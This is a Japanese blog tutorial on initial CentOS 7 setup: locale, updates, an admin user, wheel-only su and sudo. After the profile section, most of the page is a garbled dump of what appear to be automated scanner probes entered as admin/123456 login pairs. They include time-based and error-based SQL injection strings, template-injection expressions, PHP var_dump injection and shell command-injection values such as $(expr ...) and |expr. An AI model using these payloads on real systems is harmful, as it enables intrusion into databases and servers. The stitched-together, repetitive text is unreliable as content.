CentOS7:初期設定のまとめ
CentOS7をインストール後、セキュリティや管理をする上で最初にやっておくべき設定についてまとめています。
サーバーは常に危険に晒されているため、絶対に安全といったことはありません(・ω・)ノ
何か起きてもすぐに対応できるように準備をしておくといいかもしれませんね。
CentOS7の初期設定を行う
日本語化
システム全体の文字セットを日本語化
日本語化に必要なパッケージをインストール
# yum -y install ibus-kkc vlgothic-*ロケールを日本語に変更
# localectl set-locale LANG="ja_JP.UTF-8"
# source /etc/locale.conf変更が反映されているか確認
# echo $LANG環境更新
システム全体の環境を最新の状態に更新
システムのアップデート
# yum -y update管理用ユーザー作成
普段利用するroot以外の管理用ユーザーを作成
ユーザー追加
# useradd userユーザーのパスワード変更
# passwd userwheelグループのみ管理者権限
wheelグループのみ管理ユーザーになれるように設定を変更
pamの設定変更
# vi /etc/pam.d/su #auth required pam_wheel.so use_uid
>> auth required pam_wheel.so use_uid管理用ユーザーのグループを変更
# usermod -G wheel uservisudoの設定変更
# visudo #%wheel ALL=(ALL) ALL
>> %wheel ALL=(ALL) ALLsudoが使えるか別ターミナルより確認
# sudo localectl statusその他の記事
作成日:2017/05/14
更新日:2018/08/16
プロフィール
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('d',2)='d
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('r',0)='r
admin
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('c',2)
admin
123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('q',0)
admin
123456'and(select+1)>0waitfor/**/delay'0:0:2
admin
123456'and(select+1)>0waitfor/**/delay'0:0:0
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
admin
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
admin
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
admin
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
admin
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
admin
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
admin
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
admin
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
admin
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
admin
(select*from(select+sleep(2)union/**/select+1)a)
admin
(select*from(select+sleep(0)union/**/select+1)a)
admin
123456"and"a"="n
admin
123456"and"l"="l
admin
123456'and'x'='g
admin
123456'and'z'='z
admin
123456/**/and+2=6
admin
123456/**/and+2=2
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin'"\(
123456
admin
123456
admin鎈'"\(
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456'"\(
admin
123456
admin
123456鎈'"\(
admin
123456
admin
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1482150552')))>'0
admin
123456
admin
<%- 919388229+840429199 %>
admin
123456
admin
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1227168621')))
admin
#set($c=983913083+925781856)${c}$c
admin
123456
admin
123456/**/and/**/cast(md5('1880400172')as/**/int)>0
admin
123456
admin
${(883597594+875982874)?c}
admin
123456
admin
123456'and(select'1'from/**/cast(md5(1087745727)as/**/int))>'0
admin
123456
admin
${904622649+831267918}
admin
123456
admin
extractvalue(1,concat(char(126),md5(1231485524)))
admin
123456
admin
/*1*/{{991687031+833942228}}
admin
123456
admin
123456"and/**/extractvalue(1,concat(char(126),md5(1031598668)))and"
admin
123456
admin
123456
admin
123456
admin
123456'and/**/extractvalue(1,concat(char(126),md5(1598915816)))and'
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
expr 916603291 + 828069232
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
${920851784+873209919}
123456
admin
'-var_dump(md5(109923146))-'
admin
123456
admin
expr 860822224 + 993319337
admin
123456
admin
${@var_dump(md5(909535648))};
admin
${936722986+963191740}
admin
123456
admin
123456&set /A 899454446+853182800
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456$(expr 826831521 + 941131840)
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456|expr 879500779 + 822080599
admin
123456
admin
123456
admin
123456
admin
123456
<%- 882044859+997223540 %>
123456
admin
123456
expr 866121235 + 993481856
admin"and"a"="x
123456
admin
123456
admin
123456
admin
123456
admin"and"g"="g
123456
admin
123456
admin
123456
${(811867981+859880456)?c}
123456
admin
123456
admin'and'u'='z
123456
admin
123456
admin
123456
${866056144+892113139}
123456
admin
123456
admin'and's'='s
123456
admin
123456
'-var_dump(md5(722786532))-'
123456
/*1*/{{934470272+810888380}}
123456
admin
123456
admin
123456
admin
123456
${@var_dump(md5(152134365))};
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin"and"p"="h
123456
admin"and"z"="z
123456
admin'and'm'='c
123456
admin'and'g'='g
123456
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('u',2)='u
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',0)='l
admin
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('h',2)
admin
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('e',0)
admin
123456'and(select+1)>0waitfor/**/delay'0:0:2
admin
123456'and(select+1)>0waitfor/**/delay'0:0:0
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
admin
123456'"\(
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
admin
123456鎈'"\(
admin
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
admin
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1675517053')))>'0
admin
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
admin
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1433839676')))
admin
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
admin
123456/**/and/**/cast(md5('1460660284')as/**/int)>0
admin
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
admin
123456'and(select'1'from/**/cast(md5(1684533885)as/**/int))>'0
admin
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
admin
extractvalue(1,concat(char(126),md5(1136717734)))
admin
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
admin
123456"and/**/extractvalue(1,concat(char(126),md5(1682214390)))and"
admin
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
admin
123456'and/**/extractvalue(1,concat(char(126),md5(1860688295)))and'
admin
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
admin
123456
admin
(select*from(select+sleep(2)union/**/select+1)a)
admin
123456
admin
(select*from(select+sleep(0)union/**/select+1)a)
admin
123456
admin
123456"and"c"="v
admin
123456
admin
123456"and"n"="n
admin
123456
admin
123456'and'w'='l
admin
123456
admin
123456'and'w'='w
admin
123456
admin
123456/**/and+3=9
admin
123456
admin
123456/**/and+0=0
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin'"\(
123456
<%- 991632833+985472613 %>
123456
admin
123456
admin
123456
admin鎈'"\(
123456
admin
123456
admin
123456
expr 822906984 + 842583853
123456
${(897694072+873880504)?c}
123456
admin
123456
admin
123456
${817015678+863891996}
123456
admin
123456
admin
123456
admin
${915481277+945820933}
/*1*/{{817457125+913684506}}
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
<%- 807942687+832258325 %>
'-var_dump(md5(174642232))-'
123456
admin
123456
${@var_dump(md5(487120150))};
123456
admin
#set($c=962433011+850980600)${c}$c
admin
123456
admin
expr 888777908 + 837980443
admin
123456
admin
123456
admin
'-var_dump(md5(746699782))-'
admin
${(874869604+833050018)?c}
admin
123456&set /A 931064721+906728322
${856319163+929326710}
123456
admin
123456
admin
123456
admin
${@var_dump(md5(573304384))};
admin
${805253633+887865862}
admin
123456$(expr 902879645 + 819038123)
admin
123456
admin
123456
admin
123456
admin
/*1*/{{834082584+808507407}}
admin
123456|expr 894890403 + 894170520
admin
123456
admin
123456
admin
123456
expr 910671390 + 903798482
admin
123456